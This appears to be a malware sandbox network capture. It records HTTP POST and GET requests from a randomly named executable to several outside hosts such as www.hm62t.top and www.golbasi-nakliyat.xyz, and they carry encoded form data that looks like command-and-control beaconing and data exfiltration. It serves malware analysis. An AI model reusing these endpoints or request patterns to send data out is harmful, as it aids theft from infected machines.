                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    5192.168.2.549717154.23.184.240804444C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe
                    TimestampBytes transferredDirectionData
                    Sep 12, 2024 13:03:16.373815060 CEST715OUTPOST /p39s/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en
                    Host: www.hm62t.top
                    Origin: http://www.hm62t.top
                    Referer: http://www.hm62t.top/p39s/
                    Content-Type: application/x-www-form-urlencoded
                    Connection: close
                    Content-Length: 203
                    Cache-Control: max-age=0
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                    Data Raw: 6e 52 3d 34 50 56 74 50 32 42 51 67 38 71 7a 68 63 6f 68 45 76 31 4f 2f 71 41 6a 66 4d 41 59 76 34 57 39 52 38 6c 53 70 4a 62 74 48 72 59 61 35 76 64 67 46 76 32 64 48 49 5a 33 4f 77 33 54 4c 45 2f 54 41 41 76 70 50 4c 2f 47 49 41 38 34 30 4f 36 76 71 38 73 30 73 62 4e 44 34 6a 7a 33 48 51 43 65 66 61 54 32 6a 32 33 67 5a 67 66 79 79 50 7a 63 59 56 6c 48 48 4b 69 47 76 52 62 39 4b 6f 5a 61 56 4c 45 4f 4a 43 4f 64 4c 32 76 2b 35 49 56 61 39 69 50 52 55 72 54 74 76 5a 7a 72 56 61 35 52 4d 64 79 6b 52 66 7a 4e 76 72 2f 46 56 75 48 41 54 63 7a 73 6b 46 79 41 45 54 57 67 78 7a 4c 68 62 35 46 69 2f 37 63 3d
                    Data Ascii: nR=4PVtP2BQg8qzhcohEv1O/qAjfMAYv4W9R8lSpJbtHrYa5vdgFv2dHIZ3Ow3TLE/TAAvpPL/GIA840O6vq8s0sbND4jz3HQCefaT2j23gZgfyyPzcYVlHHKiGvRb9KoZaVLEOJCOdL2v+5IVa9iPRUrTtvZzrVa5RMdykRfzNvr/FVuHATczskFyAETWgxzLhb5Fi/7c=
                    Sep 12, 2024 13:03:17.267894983 CEST312INHTTP/1.1 404 Not Found
                    Server: nginx
                    Date: Thu, 12 Sep 2024 11:03:17 GMT
                    Content-Type: text/html
                    Content-Length: 148
                    Connection: close
                    ETag: "66a8e223-94"
                    Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    6192.168.2.549718154.23.184.240804444C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe
                    TimestampBytes transferredDirectionData
                    Sep 12, 2024 13:03:18.921433926 CEST735OUTPOST /p39s/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en
                    Host: www.hm62t.top
                    Origin: http://www.hm62t.top
                    Referer: http://www.hm62t.top/p39s/
                    Content-Type: application/x-www-form-urlencoded
                    Connection: close
                    Content-Length: 223
                    Cache-Control: max-age=0
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                    Data Raw: 6e 52 3d 34 50 56 74 50 32 42 51 67 38 71 7a 68 38 34 68 44 4e 64 4f 33 71 41 6b 61 4d 41 59 6d 59 57 35 52 37 74 53 70 49 50 44 48 65 41 61 35 4e 56 67 45 74 65 64 47 49 5a 33 46 51 33 53 47 6b 2f 45 41 41 69 55 50 4b 54 47 49 41 6f 34 30 50 4b 76 72 50 45 31 74 4c 4e 42 30 44 7a 31 4a 77 43 65 66 61 54 32 6a 32 53 46 5a 67 58 79 79 66 6a 63 65 78 78 47 45 4b 69 48 6d 78 62 39 64 34 5a 57 56 4c 45 6f 4a 42 4b 6e 4c 31 58 2b 35 4e 35 61 7a 54 50 53 64 72 54 72 78 70 79 58 57 61 73 4f 41 2b 2b 62 65 70 43 51 38 61 54 62 51 59 71 71 4a 2b 37 45 33 6c 65 34 55 41 65 58 67 44 71 49 42 61 56 53 68 73 4b 62 61 34 45 70 50 42 69 56 62 72 35 67 6e 76 65 64 76 48 62 48
                    Data Ascii: nR=4PVtP2BQg8qzh84hDNdO3qAkaMAYmYW5R7tSpIPDHeAa5NVgEtedGIZ3FQ3SGk/EAAiUPKTGIAo40PKvrPE1tLNB0Dz1JwCefaT2j2SFZgXyyfjcexxGEKiHmxb9d4ZWVLEoJBKnL1X+5N5azTPSdrTrxpyXWasOA++bepCQ8aTbQYqqJ+7E3le4UAeXgDqIBaVShsKba4EpPBiVbr5gnvedvHbH
                    Sep 12, 2024 13:03:19.821716070 CEST312INHTTP/1.1 404 Not Found
                    Server: nginx
                    Date: Thu, 12 Sep 2024 11:03:19 GMT
                    Content-Type: text/html
                    Content-Length: 148
                    Connection: close
                    ETag: "66a8e223-94"
                    Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    7192.168.2.549720154.23.184.240804444C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe
                    TimestampBytes transferredDirectionData
                    Sep 12, 2024 13:03:21.465765953 CEST1752OUTPOST /p39s/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en
                    Host: www.hm62t.top
                    Origin: http://www.hm62t.top
                    Referer: http://www.hm62t.top/p39s/
                    Content-Type: application/x-www-form-urlencoded
                    Connection: close
                    Content-Length: 1239
                    Cache-Control: max-age=0
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                    Data Raw: 6e 52 3d 34 50 56 74 50 32 42 51 67 38 71 7a 68 38 34 68 44 4e 64 4f 33 71 41 6b 61 4d 41 59 6d 59 57 35 52 37 74 53 70 49 50 44 48 64 67 61 35 2b 4e 67 47 4d 65 64 55 59 5a 33 47 51 33 50 47 6b 2f 5a 41 44 54 54 50 4b 50 57 49 43 51 34 33 74 79 76 69 61 77 31 6b 4c 4e 42 70 54 7a 34 48 51 43 4c 66 61 69 2b 6a 32 69 46 5a 67 58 79 79 61 6e 63 64 6c 6c 47 49 71 69 47 76 52 61 38 4b 6f 59 2f 56 4c 64 54 4a 41 2f 59 49 46 33 2b 36 74 70 61 78 6c 62 53 53 72 54 70 77 70 79 50 57 61 77 72 41 2b 6a 71 65 74 4b 36 38 5a 7a 62 54 70 76 4c 54 4b 4b 62 68 32 53 44 62 44 53 57 79 43 66 71 4a 70 78 4b 73 4f 47 4c 66 72 51 30 4d 31 69 48 65 70 59 4e 6c 4a 69 76 67 44 69 66 4e 47 55 2b 50 54 6b 55 63 32 61 53 31 4a 4f 49 6f 6a 66 67 4e 65 4f 47 65 39 4e 57 43 6a 66 6e 57 6f 6b 6c 50 53 70 46 6d 6e 6d 6d 76 48 66 4a 53 54 34 54 6c 39 58 33 53 4e 53 46 38 30 59 72 68 53 47 7a 33 55 37 2b 35 32 54 79 57 38 33 31 47 5a 47 71 6d 39 74 77 79 6e 32 6a 34 46 7a 31 37 31 2f 31 6d 61 78 63 4c 79 30 72 4d 44 66 4b 44 5a 2b [TRUNCATED]
                    Data Ascii: nR=4PVtP2BQg8qzh84hDNdO3qAkaMAYmYW5R7tSpIPDHdga5+NgGMedUYZ3GQ3PGk/ZADTTPKPWICQ43tyviaw1kLNBpTz4HQCLfai+j2iFZgXyyancdllGIqiGvRa8KoY/VLdTJA/YIF3+6tpaxlbSSrTpwpyPWawrA+jqetK68ZzbTpvLTKKbh2SDbDSWyCfqJpxKsOGLfrQ0M1iHepYNlJivgDifNGU+PTkUc2aS1JOIojfgNeOGe9NWCjfnWoklPSpFmnmmvHfJST4Tl9X3SNSF80YrhSGz3U7+52TyW831GZGqm9twyn2j4Fz171/1maxcLy0rMDfKDZ+pWTDr6LnrlNbxPOPrBRdTCBzpxfL5akqaMCxXfoeOSKURGywt0+G2Vv0BU9pJQ8QiUw/ouZq2m79t9hJO4g71cnqwRxRjl7U4tufzTXDlg1XFRpF0svNr/sHnG8JAv8m80pxxr14Z13dbI2S9uEiKNbedl7IkF844rTO1PPRaBfzPu/nMjAR6nEWwDBSoABxuW6eQwUIeKMO2me9lVpAJXKWwErbTl8ZoWhwF5IkB6nZahgUKHDXA2xbm9smoO+cj6KNSmCFoYkTyxyWDeYn3Ux/dpQehm0lgsmMqriUq4p2I7dsPXPJA2nFix9cQNFbgungkg49mAaGXNEiuYKAu7WqsP6vkAs+1q0QPOXaZxeg3lIpWbP/RXPZsBusH3wVLn7N4xhGXU1xkmiiWdZr7nQSPZbCazM8RuiJhKpraQaqpd5qEgzwwTnQxI6ygFLN5s4ZwrocAw/ePMlud3m81VZPsRubrNQrdETwr1cXVvDavguY3HNYwonv4/f3uvGsBrZwaN/2MrAt5AXSbltIRFv/fRDxOeI1HmZFIRNO5LYKF0PyZxsEfajbJvfKJ+JqKK5JX6tgNUD6ivXHr7hV1NzM3Frn0/AMdCgRyglOuhDOoduD+6Q2HNDLynnDyT1bJawEZuieT+C/OPT9isJbgZxf1ibu4NyTcp [TRUNCATED]
                    Sep 12, 2024 13:03:22.355307102 CEST312INHTTP/1.1 404 Not Found
                    Server: nginx
                    Date: Thu, 12 Sep 2024 11:03:22 GMT
                    Content-Type: text/html
                    Content-Length: 148
                    Connection: close
                    ETag: "66a8e223-94"
                    Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    8192.168.2.549721154.23.184.240804444C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe
                    TimestampBytes transferredDirectionData
                    Sep 12, 2024 13:03:24.016140938 CEST456OUTGET /p39s/?nR=1N9NMDNpm9Czos0sMOBPjc8XecgVvOOrSL4zw6nNIeZI+vV5F9OeQvh5MDj1LHrQPj2dGZTcA38l142ujvV8zKUy6S3cHQGYd//xgFiAZgSqx5KudB9OKNvEpiaWMoszOg==&OJ=btRp HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                    Accept-Language: en-US,en
                    Host: www.hm62t.top
                    Connection: close
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                    Sep 12, 2024 13:03:24.935090065 CEST312INHTTP/1.1 404 Not Found
                    Server: nginx
                    Date: Thu, 12 Sep 2024 11:03:24 GMT
                    Content-Type: text/html
                    Content-Length: 148
                    Connection: close
                    ETag: "66a8e223-94"
                    Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    9192.168.2.54972285.159.66.93804444C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe
                    TimestampBytes transferredDirectionData
                    Sep 12, 2024 13:03:30.182279110 CEST748OUTPOST /k2vl/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en
                    Host: www.golbasi-nakliyat.xyz
                    Origin: http://www.golbasi-nakliyat.xyz
                    Referer: http://www.golbasi-nakliyat.xyz/k2vl/
                    Content-Type: application/x-www-form-urlencoded
                    Connection: close
                    Content-Length: 203
                    Cache-Control: max-age=0
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                    Data Raw: 6e 52 3d 65 7a 47 4a 78 39 62 65 50 2f 56 77 42 65 6c 6f 46 53 4d 61 56 2f 47 6e 32 48 4a 2b 75 6c 45 70 41 52 39 4e 61 78 32 4f 66 43 47 58 4f 6e 62 6d 6a 66 42 70 36 6e 37 6d 34 6a 79 79 4d 70 66 56 2f 63 71 37 48 76 2b 61 44 59 47 54 63 70 54 56 57 61 39 74 64 49 51 5a 59 76 46 63 30 79 55 69 33 4b 65 68 52 71 55 2f 34 7a 51 6e 55 43 35 76 4e 56 55 54 56 67 37 75 41 37 4d 33 45 54 56 56 43 74 42 6a 50 69 72 75 70 38 53 56 4c 6a 58 42 48 78 51 59 78 38 68 44 48 74 62 64 58 2b 35 5a 37 42 76 44 5a 53 64 32 38 44 59 31 62 41 32 70 54 33 2b 39 63 52 6d 33 57 78 6d 53 38 35 61 30 76 53 58 6d 4c 69 55 3d
                    Data Ascii: nR=ezGJx9beP/VwBeloFSMaV/Gn2HJ+ulEpAR9Nax2OfCGXOnbmjfBp6n7m4jyyMpfV/cq7Hv+aDYGTcpTVWa9tdIQZYvFc0yUi3KehRqU/4zQnUC5vNVUTVg7uA7M3ETVVCtBjPirup8SVLjXBHxQYx8hDHtbdX+5Z7BvDZSd28DY1bA2pT3+9cRm3WxmS85a0vSXmLiU=


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    10192.168.2.54972385.159.66.93804444C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe
                    TimestampBytes transferredDirectionData
                    Sep 12, 2024 13:03:32.717885971 CEST768OUTPOST /k2vl/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en
                    Host: www.golbasi-nakliyat.xyz
                    Origin: http://www.golbasi-nakliyat.xyz
                    Referer: http://www.golbasi-nakliyat.xyz/k2vl/
                    Content-Type: application/x-www-form-urlencoded
                    Connection: close
                    Content-Length: 223
                    Cache-Control: max-age=0
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                    Data Raw: 6e 52 3d 65 7a 47 4a 78 39 62 65 50 2f 56 77 41 2b 56 6f 48 31 59 61 41 76 47 67 36 6e 4a 2b 6b 46 45 74 41 57 31 4e 61 31 75 65 66 78 69 58 4e 46 44 6d 69 65 42 70 35 6e 37 6d 71 44 79 33 52 35 66 65 2f 63 32 7a 48 76 79 61 44 59 53 54 63 6f 50 56 57 70 6c 71 64 59 51 62 51 50 46 4e 77 79 55 69 33 4b 65 68 52 71 51 47 34 7a 59 6e 55 7a 4a 76 50 33 77 55 4c 51 37 78 4a 62 4d 33 4f 7a 56 52 43 74 41 32 50 6d 72 55 70 36 57 56 4c 69 6e 42 48 67 51 62 2b 38 68 46 61 39 61 35 61 63 30 48 2b 77 33 34 52 78 49 7a 6c 78 63 75 58 57 62 44 4a 56 32 56 50 78 4b 50 47 69 75 6c 74 4a 37 64 31 78 48 57 56 31 41 67 6e 39 7a 77 42 41 75 4e 51 59 42 78 33 45 58 43 75 57 4d 58
                    Data Ascii: nR=ezGJx9beP/VwA+VoH1YaAvGg6nJ+kFEtAW1Na1uefxiXNFDmieBp5n7mqDy3R5fe/c2zHvyaDYSTcoPVWplqdYQbQPFNwyUi3KehRqQG4zYnUzJvP3wULQ7xJbM3OzVRCtA2PmrUp6WVLinBHgQb+8hFa9a5ac0H+w34RxIzlxcuXWbDJV2VPxKPGiultJ7d1xHWV1Agn9zwBAuNQYBx3EXCuWMX


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    11192.168.2.54972485.159.66.93804444C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe
                    TimestampBytes transferredDirectionData
                    Sep 12, 2024 13:03:35.282720089 CEST1785OUTPOST /k2vl/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en
                    Host: www.golbasi-nakliyat.xyz
                    Origin: http://www.golbasi-nakliyat.xyz
                    Referer: http://www.golbasi-nakliyat.xyz/k2vl/
                    Content-Type: application/x-www-form-urlencoded
                    Connection: close
                    Content-Length: 1239
                    Cache-Control: max-age=0
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                    Data Raw: 6e 52 3d 65 7a 47 4a 78 39 62 65 50 2f 56 77 41 2b 56 6f 48 31 59 61 41 76 47 67 36 6e 4a 2b 6b 46 45 74 41 57 31 4e 61 31 75 65 66 78 71 58 4e 77 58 6d 69 39 35 70 34 6e 37 6d 78 44 79 32 52 35 66 44 2f 63 75 33 48 76 4f 77 44 62 71 54 4f 61 72 56 42 4d 52 71 53 59 51 62 53 50 46 64 30 79 55 53 33 4b 4f 74 52 71 41 47 34 7a 59 6e 55 77 52 76 49 6c 55 55 4a 51 37 75 41 37 4d 42 45 54 56 31 43 74 6f 6d 50 6d 76 45 6f 4b 32 56 4c 43 33 42 55 69 34 62 7a 38 68 48 5a 39 61 68 61 63 34 6d 2b 77 62 46 52 79 55 4a 6c 7a 4d 75 55 53 79 2b 56 6b 71 66 63 43 43 5a 47 77 76 44 7a 76 50 34 33 48 65 69 66 6b 6b 69 6c 38 54 65 58 67 71 76 5a 62 30 6d 72 79 6a 53 68 54 56 61 57 2b 2b 4f 67 36 56 6b 44 56 33 66 65 59 32 6f 6d 72 73 54 49 54 45 6a 52 74 34 43 34 52 46 67 43 64 55 2b 6a 2f 2b 54 6b 31 79 43 61 38 62 47 2b 46 6c 74 51 4b 58 46 53 57 43 35 6b 55 38 42 4d 4d 67 65 76 43 77 6f 51 7a 32 77 67 41 70 76 76 6f 38 41 6b 41 49 38 7a 36 47 38 38 50 4b 4e 76 66 48 53 49 39 55 55 69 55 77 68 77 67 52 41 72 75 73 [TRUNCATED]
                    Data Ascii: nR=ezGJx9beP/VwA+VoH1YaAvGg6nJ+kFEtAW1Na1uefxqXNwXmi95p4n7mxDy2R5fD/cu3HvOwDbqTOarVBMRqSYQbSPFd0yUS3KOtRqAG4zYnUwRvIlUUJQ7uA7MBETV1CtomPmvEoK2VLC3BUi4bz8hHZ9ahac4m+wbFRyUJlzMuUSy+VkqfcCCZGwvDzvP43Heifkkil8TeXgqvZb0mryjShTVaW++Og6VkDV3feY2omrsTITEjRt4C4RFgCdU+j/+Tk1yCa8bG+FltQKXFSWC5kU8BMMgevCwoQz2wgApvvo8AkAI8z6G88PKNvfHSI9UUiUwhwgRArusgTxY/rFLVDHq0q3vLE87hqGYHFtz5LrbKUiivcdZyYUbRdfzy+blS8+akOms3jFpWmB4Stf8N2eu3ElzLZNlfLClVcAgy65qYwvNJGctspRnb0Eq3HmCIZTPttiBVyVNq3qzlp57YuMOnW/24UXFG+F2gMSAVhfiVjjPttRnw4w1iscAAN04z/T4Yp5EfpMl1LmDSrkFBjiINS6032WGnS2lNsJdRr3dN1tlekdRpAwuyGvEqJ5MwGGTrYYVNwVj6HsM/3UZDTVC3ZFrsw6cmQybsi4AonAT9IP039/p0oTVjNcpBXSPjuqphggFLg3SXOuK1iveJyV+xjc5j36GpGuNrtqRGUEgqmvRU4l8G6FyDvkdZq+2GBNWyHNJKeVZ06gUuSRY2Ux/buJanUGLDpUh8KL/jTbHrALQexkSQM4lEFczdgi6m9qds1mC6YCwf2lULcMnxEM/CD9us0vkMT98ynWvQpBjwiHJmGv20SHOBddY1FsFdhFpslgAPgQmmxty5Qxs5jENZhcjXBLyrb3Z6Vcps7YdwVHWua3NlQTRFBADMcKXr4mBdTvCQ1bp+KDQLUpQGyk8h5H6XxitJYum5RTM3+PFIABONUBzxGp4fTrx2BbrZNO1MTthGQ7IJL/0JHI23dZrJzYIhN31mau9Lgop0aPynY [TRUNCATED]


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    12192.168.2.54972585.159.66.93804444C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe
                    TimestampBytes transferredDirectionData
                    Sep 12, 2024 13:03:37.832906961 CEST467OUTGET /k2vl/?nR=TxupyKnRMohPPcJXB3Z3XcqD+FlghHQdGmgAGE+PRAnDIVDTmPtyynXiyBeLb9PD0fLjVO+SDceqOMvNcp9bLYIXV/UJ9VQc/byMU5VVxwAJLh5LFxVJTQrrPq42LBMvWA==&OJ=btRp HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                    Accept-Language: en-US,en
                    Host: www.golbasi-nakliyat.xyz
                    Connection: close
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                    Sep 12, 2024 13:03:38.543889999 CEST225INHTTP/1.1 404 Not Found
                    Server: nginx/1.14.1
                    Date: Thu, 12 Sep 2024 11:03:38 GMT
                    Content-Length: 0
                    Connection: close
                    X-Rate-Limit-Limit: 5s
                    X-Rate-Limit-Remaining: 19
                    X-Rate-Limit-Reset: 2024-09-12T11:03:43.4315597Z


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    13192.168.2.549726185.173.111.76804444C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe
                    TimestampBytes transferredDirectionData
                    Sep 12, 2024 13:03:43.645375013 CEST742OUTPOST /lwt6/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en
                    Host: www.mfgamecompany.shop
                    Origin: http://www.mfgamecompany.shop
                    Referer: http://www.mfgamecompany.shop/lwt6/
                    Content-Type: application/x-www-form-urlencoded
                    Connection: close
                    Content-Length: 203
                    Cache-Control: max-age=0
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                    Data Raw: 6e 52 3d 75 39 31 5a 44 65 78 76 6c 4e 4b 48 4a 4f 41 5a 7a 55 76 67 78 4f 57 53 34 52 79 55 31 48 59 6f 30 2f 48 52 50 31 38 52 39 34 68 45 6a 51 63 37 61 6c 46 7a 54 2b 72 51 35 49 62 6b 53 31 42 45 2f 36 76 6f 44 4f 61 46 44 33 32 6b 48 2f 56 37 53 2b 6c 37 46 57 34 30 34 6d 44 31 44 66 45 54 37 6b 63 44 66 4d 69 4f 42 51 35 50 4c 6e 4c 4c 52 36 39 67 4f 76 70 6d 76 77 53 75 66 68 71 62 35 6e 4c 7a 4b 75 6f 33 42 77 47 31 4d 64 6c 68 44 36 6a 61 55 62 50 35 77 5a 57 6b 54 47 4f 57 76 6b 31 64 76 4e 2f 67 52 2f 73 68 7a 64 36 54 69 61 58 35 48 77 39 57 4c 55 2b 43 30 41 4b 4b 5a 52 7a 5a 4f 51 6b 3d
                    Data Ascii: nR=u91ZDexvlNKHJOAZzUvgxOWS4RyU1HYo0/HRP18R94hEjQc7alFzT+rQ5IbkS1BE/6voDOaFD32kH/V7S+l7FW404mD1DfET7kcDfMiOBQ5PLnLLR69gOvpmvwSufhqb5nLzKuo3BwG1MdlhD6jaUbP5wZWkTGOWvk1dvN/gR/shzd6TiaX5Hw9WLU+C0AKKZRzZOQk=
                    Sep 12, 2024 13:03:44.312072992 CEST1086INHTTP/1.1 301 Moved Permanently
                    Connection: close
                    content-type: text/html
                    content-length: 795
                    date: Thu, 12 Sep 2024 11:03:44 GMT
                    server: LiteSpeed
                    location: https://www.mfgamecompany.shop/lwt6/
                    platform: hostinger
                    panel: hpanel
                    content-security-policy: upgrade-insecure-requests
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
